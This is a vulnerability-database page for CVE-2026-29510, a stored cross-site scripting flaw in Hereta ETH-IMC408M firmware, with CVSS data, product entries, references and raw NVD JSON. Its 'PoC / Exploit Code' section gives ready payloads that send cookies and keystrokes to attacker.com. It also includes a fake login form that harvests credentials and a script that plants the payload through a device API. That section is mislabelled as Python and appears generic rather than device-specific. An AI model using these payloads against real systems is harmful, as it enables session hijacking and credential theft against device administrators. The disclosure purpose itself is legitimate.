CVE-2026-29510

Description

Hereta ETH-IMC408M firmware version 1.0.15 and prior contain a stored cross-site scripting vulnerability that allows authenticated attackers to inject arbitrary JavaScript by manipulating the Device Name field. Attackers can inject malicious scripts through the System Status interface that execute in browsers of users viewing the status page without input sanitation.

CVSS Details

CVSS Score

5.4

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:o:hereta:eth-imc408m_firmware:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:hereta:eth-imc408m:-:*:*:*:*:*:*:* - NOT VULNERABLE

Hereta ETH-IMC408M Firmware <= 1.0.15

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

<!-- CVE-2026-29510 PoC: Stored XSS via Device Name -->
<!-- Attack Vector: Inject JavaScript in Device Name field -->
<!-- Target: Hereta ETH-IMC408M Firmware <= 1.0.15 -->

<!-- Step 1: Login to the device web interface with low-privilege account -->
<!-- Step 2: Navigate to device configuration or System Status page -->
<!-- Step 3: Modify Device Name field with XSS payload -->

<!-- Example XSS Payloads: -->

<!-- Basic Cookie Theft -->
<img src=x onerror="this.src='http://attacker.com/steal?c='+document.cookie">

<!-- Session Hijacking -->
<script>fetch('http://attacker.com/log?cookie='+document.cookie)</script>

<!-- Keylogger -->
<script>document.addEventListener('keypress',e=>fetch('http://attacker.com/k?k='+e.key))</script>

<!-- DOM Manipulation/Phishing -->
<script>document.body.innerHTML='<h1>Session Expired. Please re-login.</h1><form action=http://attacker.com/phish><input name=username><input name=password type=password><button>Login</button></form>'</script>

<!-- Automated Exploitation Script -->
(function() {
    // Step 1: Identify vulnerable endpoint
    const targetUrl = window.location.origin;
    const deviceNameEndpoint = targetUrl + '/api/device/name';
    
    // Step 2: Prepare XSS payload
    const xssPayload = '<img src=x onerror="fetch(\'http://attacker.com/exploit?data=\'+btoa(document.cookie))">';
    
    // Step 3: Send malicious payload
    fetch(deviceNameEndpoint, {
        method: 'POST',
        headers: {
            'Content-Type': 'application/json',
            'Cookie': document.cookie
        },
        body: JSON.stringify({
            device_name: xssPayload
        })
    }).then(response => {
        console.log('Payload sent. XSS will trigger when victim views System Status page.');
    }).catch(err => {
        console.error('Exploitation failed:', err);
    });
})();

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-29510
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-29510
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-29510/
[4] VulDB https://vuldb.com/cve/CVE-2026-29510
[5] https://web.archive.org/web/20250820105319/http://hereta.com/
[6] https://www.vulncheck.com/advisories/hereta-eth-imc408m-stored-xss-via-device-name

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-29510", "sourceIdentifier": "[email protected]", "published": "2026-03-16T18:16:08.020", "lastModified": "2026-04-10T17:46:37.863", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Hereta ETH-IMC408M firmware version 1.0.15 and prior contain a stored cross-site scripting vulnerability that allows authenticated attackers to inject arbitrary JavaScript by manipulating the Device Name field. Attackers can inject malicious scripts through the System Status interface that execute in browsers of users viewing the status page without input sanitation."}, {"lang": "es", "value": "Hereta ETH-IMC408M firmware versión 1.0.15 y anteriores contienen una vulnerabilidad de cross-site scripting almacenado que permite a atacantes autenticados inyectar JavaScript arbitrario manipulando el campo Device Name. Los atacantes pueden inyectar scripts maliciosos a través de la interfaz System Status que se ejecutan en los navegadores de los usuarios que ven la página de estado sin saneamiento de entrada."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:hereta:eth-imc408m_firmware:*:*:*:*:*:*:*:*", "versionEndIncluding": "1.0.15", "matchCriteriaId": "9E114378-9A8F-4EC3-A7B3-89DF7D6BBEC0"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:hereta:eth-imc408m:-:*:*:*:*:*:*:*", "matchCriteriaId": "D3C670E1-A5ED-4FC7-8150-0B62411371F9"}]}]}], "references": [{"url": "https://web.archive.org/web/20250820105319/http://hereta.com/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.vulncheck.com/advisories/hereta-eth-imc408m-stored-xss-via-device-name", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}